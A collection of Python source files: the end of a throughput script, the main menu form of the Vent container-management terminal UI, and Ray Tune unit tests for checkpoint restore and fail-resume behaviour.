resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main() |
main.py | import npyscreen
import os
import re
import sys
import time
from docker.errors import DockerException
from npyscreen import notify_confirm
from threading import Thread
from vent.api.actions import Action
from vent.api.menu_helpers import MenuHelper
from vent.helpers.meta import Containers
from vent.helpers.meta import Cpu
from vent.helpers.meta import DropLocation
from vent.helpers.meta import Gpu
from vent.helpers.meta import Images
from vent.helpers.meta import Jobs
from vent.helpers.meta import Timestamp
from vent.helpers.meta import Uptime
from vent.helpers.logs import Logger
from vent.helpers.paths import PathDirs
from vent.menus.add import AddForm
from vent.menus.ntap import CreateNTap
from vent.menus.ntap import DeleteNTap
from vent.menus.ntap import ListNTap
from vent.menus.ntap import NICsNTap
from vent.menus.ntap import StartNTap
from vent.menus.ntap import StopNTap
from vent.menus.backup import BackupForm
from vent.menus.editor import EditorForm
from vent.menus.inventory_forms import InventoryCoreToolsForm
from vent.menus.inventory_forms import InventoryToolsForm
from vent.menus.logs import LogsForm
from vent.menus.services import ServicesForm
from vent.menus.tools import ToolForm
class MainForm(npyscreen.FormBaseNewWithMenus):
""" Main information landing form for the Vent CLI """
@staticmethod
def exit(*args, **kwargs):
os.system('reset')
os.system('stty sane')
try:
sys.exit(0)
except SystemExit: # pragma: no cover
os._exit(0)
@staticmethod
def t_status(core):
""" Get status of tools for either plugins or core """
m_helper = MenuHelper()
repos, tools = m_helper.tools_status(core)
installed = 0
custom_installed = 0
built = 0
custom_built = 0
running = 0
custom_running = 0
normal = str(len(tools['normal']))
# determine how many extra instances should be shown for running
norm = set(tools['normal'])
inst = set(tools['installed'])
run_str = str(len(tools['normal']) + len(inst - norm))
for tool in tools['running']:
# check for multi instances too for running
if tool in tools['normal']:
running += 1
elif re.sub(r'\d+$', '', tool) in tools['normal']:
running += 1
else:
custom_running += 1
for tool in tools['built']:
if tool in tools['normal']:
built += 1
else:
custom_built += 1
for tool in tools['installed']:
if tool in tools['normal']:
installed += 1
elif re.sub(r'\d+$', '', tool) not in tools['normal']:
custom_installed += 1
tools_str = str(running + custom_running) + "/" + run_str + " running"
if custom_running > 0:
tools_str += " (" + str(custom_running) + " custom)"
tools_str += ", " + str(built + custom_built) + "/" + normal + " built"
if custom_built > 0:
tools_str += " (" + str(custom_built) + " custom)"
tools_str += ", " + str(installed + custom_installed) + "/" + normal
tools_str += " installed"
if custom_built > 0:
tools_str += " (" + str(custom_installed) + " custom)"
return tools_str, (running, custom_running, normal, repos)
def while_waiting(self):
""" Update fields periodically if nothing is happening """
# give a little extra time for file descriptors to close
time.sleep(0.1)
self.addfield.value = Timestamp()
self.addfield.display()
self.addfield2.value = Uptime()
self.addfield2.display()
self.addfield3.value = str(len(Containers()))+" running"
if len(Containers()) > 0:
self.addfield3.labelColor = "GOOD"
else:
self.addfield3.labelColor = "DEFAULT"
self.addfield3.display()
# update core tool status
self.addfield5.value, values = MainForm.t_status(True)
if values[0] + values[1] == 0:
color = "DANGER"
self.addfield4.labelColor = "CAUTION"
self.addfield4.value = "Idle"
elif values[0] >= int(values[2]):
color = "GOOD"
self.addfield4.labelColor = color
self.addfield4.value = "Ready to start jobs"
else:
color = "CAUTION"
self.addfield4.labelColor = color
self.addfield4.value = "Ready to start jobs"
self.addfield5.labelColor = color
# update plugin tool status
plugin_str, values = MainForm.t_status(False)
plugin_str += ", " + str(values[3]) + " plugin(s) installed"
self.addfield6.value = plugin_str
# get jobs
jobs = Jobs()
# number of jobs, number of tool containers
self.addfield7.value = str(jobs[0]) + " jobs running (" + str(jobs[1])
self.addfield7.value += " tool containers), " + str(jobs[2])
self.addfield7.value += " completed jobs"
if jobs[0] > 0:
self.addfield4.labelColor = "GOOD"
self.addfield4.value = "Processing jobs"
self.addfield7.labelColor = "GOOD"
else:
self.addfield7.labelColor = "DEFAULT"
self.addfield4.display()
self.addfield5.display()
self.addfield6.display()
self.addfield7.display()
# if file drop location changes deal with it
logger = Logger(__name__)
status = (False, None)
if self.file_drop.value != DropLocation()[1]:
logger.info("Starting: file drop restart")
try:
self.file_drop.value = DropLocation()[1]
logger.info("Path given: " + str(self.file_drop.value))
# restart if the path is valid
if DropLocation()[0]:
status = self.api_action.clean(name='file_drop')
status = self.api_action.prep_start(name='file_drop')
else:
logger.error("file drop path name invalid" +
DropLocation()[1])
if status[0]:
tool_d = status[1]
status = self.api_action.start(tool_d)
logger.info("Status of file drop restart: " +
str(status[0]))
except Exception as e: # pragma no cover
logger.error("file drop restart failed with error: " + str(e))
logger.info("Finished: file drop restart")
self.file_drop.display()
return
@staticmethod
def core_tools(action):
""" Perform actions for core tools """
def diff(first, second):
"""
Get the elements that exist in the first list and not in the second
"""
second = set(second)
return [item for item in first if item not in second]
def popup(original, orig_type, thr, title):
"""
Start the thread and display a popup of info
until the thread is finished
"""
thr.start()
info_str = ""
while thr.is_alive():
if orig_type == 'containers':
info = diff(Containers(), original)
elif orig_type == 'images':
info = diff(Images(), original)
if info:
info_str = ""
for entry in info:
# TODO limit length of info_str to fit box
info_str += entry[0]+": "+entry[1]+"\n"
npyscreen.notify_wait(info_str, title=title)
time.sleep(1)
return
if action == 'install':
original_images = Images()
m_helper = MenuHelper()
thr = Thread(target=m_helper.cores, args=(),
kwargs={"action": "install"})
popup(original_images, "images", thr,
'Please wait, installing core containers...')
notify_confirm("Done installing core containers (any"
" already installed tools untouched).",
title='Installed core containers')
return
def add_form(self, form, form_name, form_args):
""" Add new form and switch to it """
self.parentApp.addForm(form_name, form, **form_args)
self.parentApp.change_form(form_name)
return
def remove_forms(self, form_names):
""" Remove all forms supplied """
for form in form_names:
try:
self.parentApp.removeForm(form)
except Exception as e: # pragma: no cover
pass
return
def perform_action(self, action):
""" Perform actions in the api from the CLI """
form = ToolForm
s_action = action.split("_")[0]
if 'core' in action:
form_action = s_action + ' (only core tools are shown)'
form_name = s_action.title() + " core tools"
cores = True
else:
form_action = s_action + ' (only plugin tools are shown)'
form_name = s_action.title() + " tools"
cores = False
a_type = 'containers'
if s_action in ['build']:
a_type = 'images'
forms = [action.upper() + 'TOOLS']
form_args = {'color': 'CONTROL',
'names': [s_action],
'name': form_name,
'action_dict': {'action_name': s_action,
'present_t': s_action + 'ing ' + a_type,
'past_t': s_action.title() + ' ' + a_type,
'action': form_action,
'type': a_type,
'cores': cores}}
# grammar rules
vowels = ['a', 'e', 'i', 'o', 'u']
# consonant-vowel-consonant ending
# Eg: stop -> stopping
if s_action[-1] not in vowels and \
s_action[-2] in vowels and \
s_action[-3] not in vowels:
form_args['action_dict']['present_t'] = s_action + \
s_action[-1] + 'ing ' + a_type
# word ends with a 'e'
# eg: remove -> removing
if s_action[-1] == 'e':
form_args['action_dict']['present_t'] = s_action[:-1] \
+ 'ing ' + a_type
if s_action == 'start':
form_args['names'].append('prep_start')
elif s_action == 'configure':
form_args['names'].pop()
form_args['names'].append('get_configure')
form_args['names'].append('save_configure')
form_args['names'].append('restart_tools')
if action == 'add':
form = AddForm
forms = ['ADD', 'ADDOPTIONS', 'CHOOSETOOLS']
form_args['name'] = "Add plugins"
form_args['name'] += "\t"*6 + "^Q to quit"
elif action == "inventory":
form = InventoryToolsForm
forms = ['INVENTORY']
form_args = {'color': "STANDOUT", 'name': "Inventory of tools"}
elif action == 'logs':
form = LogsForm
forms = ['LOGS']
form_args = {'color': "STANDOUT", 'name': "Logs"}
elif action == 'services_core':
form = ServicesForm
forms = ['SERVICES']
form_args = {'color': "STANDOUT",
'name': "Core Services",
'core': True}
elif action == 'services':
form = ServicesForm
forms = ['SERVICES']
form_args = {'color': "STANDOUT",
'name': "Plugin Services",
'core': False}
elif action == 'services_external':
form = ServicesForm
forms = ['SERVICES']
form_args = {'color': "STANDOUT",
'name': "External Services",
'core': False,
'external': True}
elif action == "inventory_core":
form = InventoryCoreToolsForm
forms = ['COREINVENTORY']
form_args = {'color': "STANDOUT",
'name': "Inventory of core tools"}
form_args['name'] += "\t"*8 + "^T to toggle main"
if s_action in self.view_togglable:
form_args['name'] += "\t"*8 + "^V to toggle group view"
try:
self.remove_forms(forms)
thr = Thread(target=self.add_form, args=(),
kwargs={'form': form,
'form_name': forms[0],
'form_args': form_args})
thr.start()
while thr.is_alive():
npyscreen.notify('Please wait, loading form...',
title='Loading')
time.sleep(1)
except Exception as e: # pragma: no cover
pass
return
def switch_tutorial(self, action):
""" Tutorial forms """
if action == "background":
self.parentApp.change_form('TUTORIALBACKGROUND')
elif action == "terminology":
self.parentApp.change_form('TUTORIALTERMINOLOGY')
elif action == "setup":
self.parentApp.change_form('TUTORIALGETTINGSETUP')
elif action == "building_cores":
self.parentApp.change_form('TUTORIALBUILDINGCORES')
elif action == "starting_cores":
self.parentApp.change_form('TUTORIALSTARTINGCORES')
elif action == "adding_plugins":
self.parentApp.change_form('TUTORIALADDINGPLUGINS')
elif action == "adding_files":
self.parentApp.change_form('TUTORIALADDINGFILES')
elif action == "basic_troubleshooting":
self.parentApp.change_form('TUTORIALTROUBLESHOOTING')
return
def system_commands(self, action):
""" Perform system commands """
if action == 'backup':
status = self.api_action.backup()
if status[0]:
notify_confirm("Vent backup successful")
else:
notify_confirm("Vent backup could not be completed")
elif action == 'configure':
form_args = {'name': 'Change vent configuration',
'get_configure': self.api_action.get_configure,
'save_configure': self.api_action.save_configure,
'restart_tools': self.api_action.restart_tools,
'vent_cfg': True}
add_kargs = {'form': EditorForm,
'form_name': 'CONFIGUREVENT',
'form_args': form_args}
self.add_form(**add_kargs)
elif action == "reset":
okay = npyscreen.notify_ok_cancel(
"This factory reset will remove ALL of Vent's user data, "
"containers, and images. Are you sure?",
title="Confirm system command")
if okay:
status = self.api_action.reset()
if status[0]:
notify_confirm("Vent reset complete. "
"Press OK to exit Vent Manager console.")
else:
notify_confirm(status[1])
MainForm.exit()
elif action == "gpu":
gpu = Gpu(pull=True)
if gpu[0]:
notify_confirm("GPU detection successful. "
"Found: " + gpu[1])
else:
if gpu[1] == "Unknown":
notify_confirm("Unable to detect GPUs, try `make gpu` "
"from the vent repository directory. "
"Error: " + str(gpu[2]))
else:
notify_confirm("No GPUs detected.")
elif action == 'restore':
backup_dir_home = os.path.expanduser('~')
backup_dirs = [f for f in os.listdir(backup_dir_home) if
f.startswith('.vent-backup')]
form_args = {'restore': self.api_action.restore,
'dirs': backup_dirs,
'name': "Pick a version to restore from" + "\t"*8 +
"^T to toggle main",
'color': 'CONTROL'}
add_kargs = {'form': BackupForm,
'form_name': 'CHOOSEBACKUP',
'form_args': form_args}
self.add_form(**add_kargs)
elif action == "swarm":
# !! TODO
# add notify_cancel_ok popup once implemented
pass
elif action == "upgrade":
# !! TODO
# add notify_cancel_ok popup once implemented
pass
# deal with all network tap actions
elif 'ntap' in action:
# check if the tool is installed, built, and running
output = self.api_action.tool_status_output('network_tap')
# create a dict with substring as keys and forms as values
ntap_form = {'create': CreateNTap,
'delete': DeleteNTap,
'list': ListNTap,
'nics': NICsNTap,
'start': StartNTap,
'stop': StopNTap}
if output[0]:
if output[1]:
notify_confirm(output[1])
else:
# action regarding ntap come in the form of 'ntapcreate'
# 'ntapdelete', etc
tap_action = action.split('ntap')[1]
form_args = {'color': 'CONTROL',
'name': 'Network Tap Interface ' +
tap_action + "\t"*6 +
'^T to toggle main'}
self.add_form(ntap_form[tap_action], "Network Tap " +
tap_action.title(), form_args)
return
def create(self):
""" Override method for creating FormBaseNewWithMenu form """
try:
self.api_action = Action()
except DockerException as de: # pragma: no cover
notify_confirm(str(de),
title="Docker Error",
form_color='DANGER',
wrap=True)
MainForm.exit()
self.add_handlers({"^T": self.help_form, "^Q": MainForm.exit})
# all forms that can toggle view by group
self.view_togglable = ['inventory', 'remove', 'update', 'enable',
'disable', 'build']
#######################
# MAIN SCREEN WIDGETS #
#######################
self.addfield = self.add(npyscreen.TitleFixedText, name='Date:',
labelColor='DEFAULT', value=Timestamp())
self.addfield2 = self.add(npyscreen.TitleFixedText, name='Uptime:',
labelColor='DEFAULT', value=Uptime())
self.cpufield = self.add(npyscreen.TitleFixedText,
name='Logical CPUs:',
labelColor='DEFAULT', value=Cpu())
self.gpufield = self.add(npyscreen.TitleFixedText, name='GPUs:',
labelColor='DEFAULT', value=Gpu()[1])
self.location = self.add(npyscreen.TitleFixedText,
name='User Data:',
value=PathDirs().meta_dir,
labelColor='DEFAULT')
self.file_drop = self.add(npyscreen.TitleFixedText,
name='File Drop:',
value=DropLocation()[1],
labelColor='DEFAULT')
self.addfield3 = self.add(npyscreen.TitleFixedText, name='Containers:',
labelColor='DEFAULT',
value="0 "+" running")
self.addfield4 = self.add(npyscreen.TitleFixedText, name='Status:',
labelColor='CAUTION',
value="Idle")
self.addfield5 = self.add(npyscreen.TitleFixedText,
name='Core Tools:', labelColor='DANGER',
value="Not built")
self.addfield6 = self.add(npyscreen.TitleFixedText,
name='Plugin Tools:', labelColor='DEFAULT',
value="Not built")
self.addfield7 = self.add(npyscreen.TitleFixedText, name='Jobs:',
value="0 jobs running (0 tool containers),"
" 0 completed jobs", labelColor='DEFAULT')
self.multifield1 = self.add(npyscreen.MultiLineEdit, max_height=22,
editable=False, value="""
'.,
'b *
'$ #.
$: #:
*# @):
:@,@): ,.**:'
, :@@*: ..**'
'#o. .:(@'.@*"'
'bq,..:,@@*' ,*
,p$q8,:@)' .p*'
' '@@Pp@@*'
Y7'.'
:@):.
.:@:'.
.::(@:.
_
__ _____ _ __ | |_
\ \ / / _ \ '_ \| __|
\ V / __/ | | | |_
\_/ \___|_| |_|\__|
""")
################
# MENU OPTIONS #
################
# Core Tools Menu Items
self.m2 = self.add_menu(name="Core Tools", shortcut="c")
self.m2.addItem(text='Add all latest core tools',
onSelect=MainForm.core_tools,
arguments=['install'], shortcut='i')
self.m2.addItem(text='Build core tools',
onSelect=self.perform_action,
arguments=['build_core'], shortcut='b')
self.m2.addItem(text='Clean core tools',
onSelect=self.perform_action,
arguments=['clean_core'], shortcut='c')
self.m2.addItem(text='Configure core tools',
onSelect=self.perform_action,
arguments=['configure_core'], shortcut='t')
self.m2.addItem(text='Disable core tools',
onSelect=self.perform_action,
arguments=['disable_core'], shortcut='d')
self.m2.addItem(text='Enable core tools',
onSelect=self.perform_action,
arguments=['enable_core'], shortcut='e')
self.m2.addItem(text='Inventory of core tools',
onSelect=self.perform_action,
arguments=['inventory_core'], shortcut='v')
self.m2.addItem(text='Remove core tools',
onSelect=self.perform_action,
arguments=['remove_core'], shortcut='r')
self.m2.addItem(text='Start core tools',
onSelect=self.perform_action,
arguments=['start_core'], shortcut='s')
self.m2.addItem(text='Stop core tools',
onSelect=self.perform_action,
arguments=['stop_core'], shortcut='p')
self.m2.addItem(text='Update core tools',
onSelect=self.perform_action,
arguments=['update_core'], shortcut='u')
# Plugin Menu Items
self.m3 = self.add_menu(name="Plugins", shortcut="p")
self.m3.addItem(text='Add new plugin',
onSelect=self.perform_action,
arguments=['add'], shortcut='a')
self.m3.addItem(text='Build plugin tools',
onSelect=self.perform_action,
arguments=['build'], shortcut='b')
self.m3.addItem(text='Clean plugin tools',
onSelect=self.perform_action,
arguments=['clean'], shortcut='c')
self.m3.addItem(text='Configure plugin tools',
onSelect=self.perform_action,
arguments=['configure'], shortcut='t')
self.m3.addItem(text='Disable plugin tools',
onSelect=self.perform_action,
arguments=['disable'], shortcut='d')
self.m3.addItem(text='Enable plugin tools',
onSelect=self.perform_action,
arguments=['enable'], shortcut='e')
self.m3.addItem(text='Inventory of installed plugins',
onSelect=self.perform_action,
arguments=['inventory'], shortcut='i')
self.m3.addItem(text='Remove plugins',
onSelect=self.perform_action,
arguments=['remove'], shortcut='r')
self.m3.addItem(text='Start plugin tools',
onSelect=self.perform_action,
arguments=['start'], shortcut='s')
self.m3.addItem(text='Stop plugin tools',
onSelect=self.perform_action,
arguments=['stop'], shortcut='p')
self.m3.addItem(text='Update plugins',
onSelect=self.perform_action,
arguments=['update'], shortcut='u')
# Log Menu Items
self.m4 = self.add_menu(name="Logs", shortcut="l")
self.m4.addItem(text='Get container logs', arguments=['logs'],
onSelect=self.perform_action)
# Services Menu Items
self.m5 = self.add_menu(name="Services Running", shortcut='s')
self.m5.addItem(text='Core Services', onSelect=self.perform_action,
arguments=['services_core'], shortcut='c')
self.m5.addItem(text='External Services', onSelect=self.perform_action,
arguments=['services_external'], shortcut='e')
self.m5.addItem(text='Plugin Services',
onSelect=self.perform_action,
arguments=['services'], shortcut='p')
# System Commands Menu Items
self.m6 = self.add_menu(name="System Commands", shortcut='y')
self.m6.addItem(text='Backup', onSelect=self.system_commands,
arguments=['backup'], shortcut='b')
self.m6.addItem(text='Change vent configuration',
onSelect=self.system_commands, arguments=['configure'],
shortcut='c')
self.m6.addItem(text='Detect GPUs', onSelect=self.system_commands,
arguments=['gpu'], shortcut='g')
self.m6.addItem(text='Enable Swarm Mode (To Be Implemented...)',
onSelect=self.system_commands,
arguments=['swarm'], shortcut='s')
self.m6.addItem(text='Factory reset', onSelect=self.system_commands,
arguments=['reset'], shortcut='r')
self.s6 = self.m6.addNewSubmenu(name='Network Tap Interface',
shortcut='n')
self.m6.addItem(text='Restore', onSelect=self.system_commands,
arguments=['restore'], shortcut='t')
self.m6.addItem(text='Upgrade (To Be Implemented...)',
onSelect=self.system_commands,
arguments=['upgrade'], shortcut='u')
self.s6.addItem(text='Create', onSelect=self.system_commands,
shortcut='c', arguments=['ntapcreate'])
self.s6.addItem(text='Delete', onSelect=self.system_commands,
shortcut='d', arguments=['ntapdelete'])
self.s6.addItem(text='List', onSelect=self.system_commands,
shortcut='l', arguments=['ntaplist'])
self.s6.addItem(text='NICs', onSelect=self.system_commands,
shortcut='n', arguments=['ntapnics'])
self.s6.addItem(text='Start', onSelect=self.system_commands,
shortcut='s', arguments=['ntapstart'])
self.s6.addItem(text='Stop', onSelect=self.system_commands,
shortcut='t', arguments=['ntapstop'])
# Tutorial Menu Items
self.m7 = self.add_menu(name="Tutorials", shortcut="t")
self.s1 = self.m7.addNewSubmenu(name="About Vent", shortcut='v')
self.s1.addItem(text="Background", onSelect=self.switch_tutorial,
arguments=['background'], shortcut='b')
self.s1.addItem(text="Terminology", onSelect=self.switch_tutorial,
arguments=['terminology'], shortcut='t')
self.s1.addItem(text="Getting Setup", onSelect=self.switch_tutorial,
arguments=['setup'], shortcut='s')
self.s2 = self.m7.addNewSubmenu(name="Working with Cores",
shortcut='c')
self.s2.addItem(text="Building Cores", onSelect=self.switch_tutorial,
arguments=['building_cores'], shortcut='b')
self.s2.addItem(text="Starting Cores", onSelect=self.switch_tutorial,
arguments=['starting_cores'], shortcut='c')
self.s3 = self.m7.addNewSubmenu(name="Working with Plugins",
shortcut='p')
self.s3.addItem(text="Adding Plugins", onSelect=self.switch_tutorial,
arguments=['adding_plugins'], shortcut='a')
self.s4 = self.m7.addNewSubmenu(name="Files", shortcut='f')
self.s4.addItem(text="Adding Files", onSelect=self.switch_tutorial,
arguments=['adding_files'], shortcut='a')
self.s5 = self.m7.addNewSubmenu(name="Help", shortcut='s')
self.s5.addItem(text="Basic Troubleshooting",
onSelect=self.switch_tutorial,
arguments=['basic_troubleshooting'], shortcut='t')
def help_form(self, *args, **keywords):
""" Toggles to help """
self.parentApp.change_form("HELP")
|
test_tune_restore.py | # coding: utf-8
import signal
from collections import Counter
import multiprocessing
import os
import shutil
import tempfile
import threading
import time
from typing import List
import unittest
import ray
from ray import tune
from ray._private.test_utils import recursive_fnmatch
from ray.exceptions import RayTaskError
from ray.rllib import _register_all
from ray.tune import TuneError
from ray.tune.callback import Callback
from ray.tune.suggest.basic_variant import BasicVariantGenerator
from ray.tune.suggest import Searcher
from ray.tune.trial import Trial
from ray.tune.trial_runner import TrialRunner
from ray.tune.utils import validate_save_restore
from ray.tune.utils.mock_trainable import MyTrainableClass
class TuneRestoreTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=1, num_gpus=0, local_mode=True)
tmpdir = tempfile.mkdtemp()
test_name = "TuneRestoreTest"
tune.run(
"PG",
name=test_name,
stop={"training_iteration": 1},
checkpoint_freq=1,
local_dir=tmpdir,
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
logdir = os.path.expanduser(os.path.join(tmpdir, test_name))
self.logdir = logdir
self.checkpoint_path = recursive_fnmatch(logdir, "checkpoint-1")[0]
def tearDown(self):
shutil.rmtree(self.logdir)
ray.shutdown()
_register_all()
def testTuneRestore(self):
self.assertTrue(os.path.isfile(self.checkpoint_path))
tune.run(
"PG",
name="TuneRestoreTest",
stop={"training_iteration": 2}, # train one more iteration.
checkpoint_freq=1,
restore=self.checkpoint_path, # Restore the checkpoint
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
def testPostRestoreCheckpointExistence(self):
"""Tests that checkpoint restored from is not deleted post-restore."""
self.assertTrue(os.path.isfile(self.checkpoint_path))
tune.run(
"PG",
name="TuneRestoreTest",
stop={"training_iteration": 2},
checkpoint_freq=1,
keep_checkpoints_num=1,
restore=self.checkpoint_path,
config={
"env": "CartPole-v0",
"framework": "tf",
},
)
self.assertTrue(os.path.isfile(self.checkpoint_path))
# Defining the callbacks at the file level, so they can be pickled and spawned
# in a separate process.
class SteppingCallback(Callback):
def __init__(self, driver_semaphore, trainer_semaphore):
self.driver_semaphore = driver_semaphore
self.trainer_semaphore = trainer_semaphore
def on_step_end(self, iteration, trials, **info):
self.driver_semaphore.release() # Driver should continue
self.trainer_semaphore.acquire() # Wait until released
def _run(local_dir, driver_semaphore, trainer_semaphore):
def _train(config):
for i in range(7):
tune.report(val=i)
tune.run(
_train,
local_dir=local_dir,
name="interrupt",
callbacks=[SteppingCallback(driver_semaphore, trainer_semaphore)],
)
class TuneInterruptionTest(unittest.TestCase):
def testExperimentInterrupted(self):
local_dir = tempfile.mkdtemp()
# Unix platforms may default to "fork", which is problematic with
# multithreading and GRPC. The child process should always be spawned.
mp_ctx = multiprocessing.get_context("spawn")
driver_semaphore = mp_ctx.Semaphore()
trainer_semaphore = mp_ctx.Semaphore()
process = mp_ctx.Process(
target=_run,
args=(local_dir, driver_semaphore, trainer_semaphore),
name="tune_interrupt",
)
process.daemon = False
process.start()
exp_dir = os.path.join(local_dir, "interrupt")
# Skip first five steps
for i in range(5):
driver_semaphore.acquire() # Wait for callback
trainer_semaphore.release() # Continue training
driver_semaphore.acquire()
experiment_state_file = None
for file in os.listdir(exp_dir):
if file.startswith("experiment_state"):
experiment_state_file = os.path.join(exp_dir, file)
break
self.assertTrue(experiment_state_file)
last_mtime = os.path.getmtime(experiment_state_file)
# Now send kill signal
os.kill(process.pid, signal.SIGINT)
# Release trainer. It should handle the signal and try to
# checkpoint the experiment
trainer_semaphore.release()
time.sleep(2) # Wait for checkpoint
new_mtime = os.path.getmtime(experiment_state_file)
self.assertNotEqual(last_mtime, new_mtime)
shutil.rmtree(local_dir)
def testInterruptDisabledInWorkerThread(self):
# https://github.com/ray-project/ray/issues/22295
# This test will hang without the proper patch because tune.run will fail.
event = threading.Event()
def run_in_thread():
def _train(config):
for i in range(7):
tune.report(val=i)
tune.run(
_train,
)
event.set()
thread = threading.Thread(target=run_in_thread)
thread.start()
event.wait()
thread.join()
ray.shutdown()
del os.environ["TUNE_DISABLE_SIGINT_HANDLER"]
class TuneFailResumeGridTest(unittest.TestCase):
class FailureInjectorCallback(Callback):
"""Adds random failure injection to the TrialExecutor."""
def __init__(self, num_trials=20):
self.num_trials = num_trials
def on_step_end(self, trials, **kwargs):
if len(trials) == self.num_trials:
print(f"Failing after {self.num_trials} trials.")
raise RuntimeError
class CheckStateCallback(Callback):
"""Checks state for the experiment initialization."""
def __init__(self, expected_trials=20):
self.expected_trials = expected_trials
self._checked = False
def on_step_begin(self, iteration, trials, **kwargs):
if not self._checked:
assert len(trials) == self.expected_trials
self._checked = True
class CheckTrialResourcesCallback(Callback):
"""Checks if pending trials are requesting the right amount of
resources.
The check happens exactly once after `check_after` number of calls
to on_step_begin(). Note, we deliberately delay the check to after
`check_after` number of steps. This is because when we start a
tuning job from fresh (rather than restored), trial list is still
empty - any check now would be trivial and thus wasted.
"""
def __init__(self, expected_cpu: int, check_after: int = 1):
self._expected_cpu = expected_cpu
self._checked = False
self._check_after = check_after
def on_step_begin(self, iteration: int, trials: List["Trial"], **info):
if not self._checked and iteration >= self._check_after:
for trial in trials:
if trial.status == Trial.PENDING:
assert (
trial.placement_group_factory.required_resources.get(
"CPU", 0
)
== self._expected_cpu
)
self._checked = True
def setUp(self):
self.logdir = tempfile.mkdtemp()
os.environ["TUNE_GLOBAL_CHECKPOINT_S"] = "0"
# Change back to local_mode=True after this is resolved:
# https://github.com/ray-project/ray/issues/13932
ray.init(local_mode=False, num_cpus=2)
from ray.tune import register_trainable
register_trainable("trainable", MyTrainableClass)
def tearDown(self):
os.environ.pop("TUNE_GLOBAL_CHECKPOINT_S")
shutil.rmtree(self.logdir)
ray.shutdown()
def testFailResumeGridSearch(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run("trainable", callbacks=[self.FailureInjectorCallback()], **config)
analysis = tune.run(
"trainable", resume=True, callbacks=[self.CheckStateCallback()], **config
)
assert len(analysis.trials) == 27
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert all(v == 9 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert all(v == 9 for v in test2_counter.values())
# Unfinished trials' resources should be updated.
def testResourceUpdateInResume(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[
self.FailureInjectorCallback(),
self.CheckTrialResourcesCallback(1),
],
**config,
)
analysis = tune.run(
"trainable",
resume=True,
resources_per_trial={"cpu": 2},
callbacks=[self.CheckTrialResourcesCallback(2)],
**config,
)
assert len(analysis.trials) == 27
def testFailResumeWithPreset(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
search_alg = BasicVariantGenerator(
points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
)
config = dict(
num_samples=3 + 3, # 3 preset, 3 samples
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[self.FailureInjectorCallback(5)],
search_alg=search_alg,
**config,
)
analysis = tune.run(
"trainable",
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=5)],
search_alg=search_alg,
**config,
)
assert len(analysis.trials) == 34
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert test_counter.pop(-1) == 4
assert all(v == 10 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert test2_counter.pop(-1) == 4
assert all(v == 10 for v in test2_counter.values())
def testFailResumeAfterPreset(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
search_alg = BasicVariantGenerator(
points_to_evaluate=[{"test": -1, "test2": -1}, {"test": -1}, {"test2": -1}]
)
config = dict(
num_samples=3 + 3, # 3 preset, 3 samples
fail_fast=True,
config={
"test": tune.grid_search([1, 2, 3]),
"test2": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertRaises(RuntimeError):
tune.run(
"trainable",
callbacks=[self.FailureInjectorCallback(15)],
search_alg=search_alg,
**config,
)
analysis = tune.run(
"trainable",
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=15)],
search_alg=search_alg,
**config,
)
assert len(analysis.trials) == 34
test_counter = Counter([t.config["test"] for t in analysis.trials])
assert test_counter.pop(-1) == 4
assert all(v == 10 for v in test_counter.values())
test2_counter = Counter([t.config["test2"] for t in analysis.trials])
assert test2_counter.pop(-1) == 4
assert all(v == 10 for v in test2_counter.values())
def testMultiExperimentFail(self):
os.environ["TUNE_MAX_PENDING_TRIALS_PG"] = "1"
experiments = []
for i in range(3):
experiments.append(
tune.Experiment(
run=MyTrainableClass,
name="trainable",
num_samples=2,
config={
"test": tune.grid_search([1, 2, 3]),
},
stop={"training_iteration": 1},
local_dir=self.logdir,
)
)
with self.assertRaises(RuntimeError):
tune.run(
experiments,
callbacks=[self.FailureInjectorCallback(10)],
fail_fast=True,
)
analysis = tune.run(
experiments,
resume=True,
callbacks=[self.CheckStateCallback(expected_trials=10)],
fail_fast=True,
)
assert len(analysis.trials) == 18
def testWarningLargeGrid(self):
config = dict(
num_samples=3,
fail_fast=True,
config={
"test": tune.grid_search(list(range(20))),
"test2": tune.grid_search(list(range(20))),
"test3": tune.grid_search(list(range(20))),
"test4": tune.grid_search(list(range(20))),
"test5": tune.grid_search(list(range(20))),
},
stop={"training_iteration": 2},
local_dir=self.logdir,
verbose=1,
)
with self.assertWarnsRegex(UserWarning, "exceeds the serialization threshold"):
with self.assertRaises(RuntimeError):
tune.run(
"trainable", callbacks=[self.FailureInjectorCallback(10)], **config
)
class TuneExampleTest(unittest.TestCase):
def setUp(self):
ray.init(num_cpus=2)
def tearDown(self):
ray.shutdown()
_register_all()
def testPBTKeras(self):
from ray.tune.examples.pbt_tune_cifar10_with_keras import Cifar10Model
from tensorflow.python.keras.datasets import cifar10
cifar10.load_data()
validate_save_restore(Cifar10Model)
